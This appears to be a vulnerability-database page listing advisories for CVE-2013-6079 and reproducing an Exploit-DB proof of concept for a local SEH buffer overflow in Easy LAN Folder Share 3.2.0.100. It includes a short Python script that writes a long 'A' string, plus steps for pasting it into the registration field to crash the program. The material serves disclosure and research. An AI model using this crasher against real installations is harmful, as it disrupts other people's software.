| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
| CVE-2013-6079 | 14 Jun 201300:00 | – | circl | |
| MostGear Soft EasyLan Folder Share 320100 Activation Denial of Service - Ver2 (CVE-2013-6079) | 28 Dec 201400:00 | – | checkpoint_advisories | |
| CVE-2013-6079 | 11 Oct 201322:00 | – | cve | |
| CVE-2013-6079 | 11 Oct 201322:00 | – | cvelist | |
| Easy LAN Folder Share 3.2.0.100 - Local Buffer Overflow (SEH) | 3 Aug 201300:00 | – | exploitdb | |
| EUVD-2013-5908 | 7 Oct 202500:30 | – | euvd | |
| CVE-2013-6079 | 11 Oct 201322:55 | – | nvd | |
| Buffer overflow | 11 Oct 201322:55 | – | prion | |
| CVE-2013-6079 | 7 Jan 202609:50 | – | redhatcve |
# Exploit Title: Easy LAN Folder Share Version 3.2.0.100 Buffer Overflow vulnerability(SEH)
# Date: 14-06-2013
# Exploit Author: ariarat
# Vendor Homepage: http://www.mostgear.com
# Software Link: http://download.cnet.com/Easy-LAN-Folder-Share/3000-2085_4-10909166.html
# Version: 3.2.0.100
# Tested on: [ Windows 7 & windows XP sp2,sp3]
#============================================================================================
# After creating txt file,open created file and copy the AAA... string to clipboard and
# then paste in "Register -> Activate License -> Registration Code" section.
# ** type any character in User Name text field.
#
#============================================================================================
# Contact :
#------------------
# Web Page : http://ariarat.blogspot.com
# Email : [email protected]
#============================================================================================
#!/usr/bin/python
filename="string.txt"
buffer = "\x41" * 1000
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation